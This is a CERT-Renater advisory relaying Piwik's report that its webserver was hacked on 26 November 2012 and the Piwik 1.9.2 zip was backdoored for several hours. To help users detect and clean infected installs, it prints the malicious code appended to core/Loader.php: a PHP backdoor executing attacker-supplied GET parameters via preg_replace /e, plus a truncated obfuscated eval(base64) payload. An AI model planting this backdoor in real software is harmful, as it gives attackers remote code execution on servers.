====================================================================

                             CERT-Renater

                  Note d'Information No. 2012/VULN470
____________________________________________________________________

DATE                :  28/11/2012

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S) : Systems running Piwik versions 1.9.2 downloaded
                       on Nov 26th from 15:43 UTC to 23:59 UTC.

======================================================================
http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/
______________________________________________________________________

 Security Report: Piwik.org webserver hacked for a few hours on 2012 Nov
26th

Important Security Announcement: Piwik.org webserver got compromised by
an attacker on 2012 Nov 26th, this attacker  added a malicious code in
the Piwik 1.9.2 Zip file for a few hours.


How do I know if my Piwik server is safe?

You would be at risk only if you installed or updated to Piwik 1.9.2 on
Nov 26th from 15:43 UTC to 23:59 UTC.

If you are not using 1.9.2, or if you have updated to 1.9.2 earlier
than Nov 26th 15:40 UTC or from Nov 27th, you should be safe.


How do I double check if my Piwik server is affected?

To check if your Piwik is affected, open the file piwik/core/Loader.php
– a clean file looks like this, where as a compromised Loader.php would
contain the following code at the end of the file:

<?php Error_Reporting(0);       if(isset($_GET['g']) && isset($_GET['s'])) {
preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF/IlKatiIlnbIOZ/bpzb2pAyXRl7uF/s7JuffmMlrf3y7XD09OSWbUo9RzF6XzHCz3+0pOeDW0C79s2vqtaSdOTRKZOxfXDlmJOvp8LbzHwJle/aIYEL0YWE$

If you see this malicious code in your piwik/core/Loader.php file, read
below to fix this issue.


How do I fix my Piwik if it is compromised?

If you Piwik is compromised, follow these steps:

    Backup piwik/config/config.ini.php
    DELETE the piwik/ directory
    It is important to DELETE the directory and all piwik files, to
ensure any malicious script is deleted as well.
    Download latest Piwik from piwik.org
    Unzip and Upload the piwik/ directory  on your server
    Copy the config.ini.php back in /piwik/config/
    Go to Piwik, it should display the dashboard as expected

You have now successful restored Piwik to a clean version.

If you have other web softwares running in the same path on your
server,  we would recommend to be safe and restore a backup of these
other softwares as well.


How did the attacker got in piwik.org?

Attacker used a security issue in a WordPress plugin we were using, and
gained partial access to the piwik.org server.


Is there a security bug  in Piwik software itself?

The website Piwik.org is running WordPress and got compromised, because
of a security issue in a WordPress plugin. As far as we know, the Piwik
software  does not have any exploitable security issue. We have a
security bug bounty program in place that rewards researchers for
finding security issues in Piwik software, and disclosing them to us.
We also document here how you can make your own Piwik data safer and
secure your server.


Has any sensitive data been leaked?

Piwik is a self-hosted, open source software. Piwik.org does not track
any web analytics data from any Piwik user. No personal or sensitive
data has been leaked since we do not track any.


What we are doing to prevent further issues

We are still working with our system administrators on the issue and
have some ideas to make this kind of problems much less likely to
occur. We will post a follow up once these new mechanisms are in place.


Summary

We would like to thank the Piwik users who quickly reported this
problem (by email and in the forums). We received more than five
reports in a two hours timeframe, which shows that the Piwik community
is very vigilant and ready to react to any problem.


We are truly sorry for the inconvenience. Please be sure that we will
do our best to keep Piwik (and Piwik.org) a safe place in the future.


Contact us at security@piwik.org if you need more info.

=========================================================
Serveur de référence du CERT-Renater
https://services.renater.fr/ssi/
=========================================================
+ CERT-RENATER          | tel : 01-53-94-20-44          +
+ 23 - 25 Rue Daviel    | fax : 01-53-94-20-41          +
+ 75013 Paris           | email: certsvp@renater.fr     +
=========================================================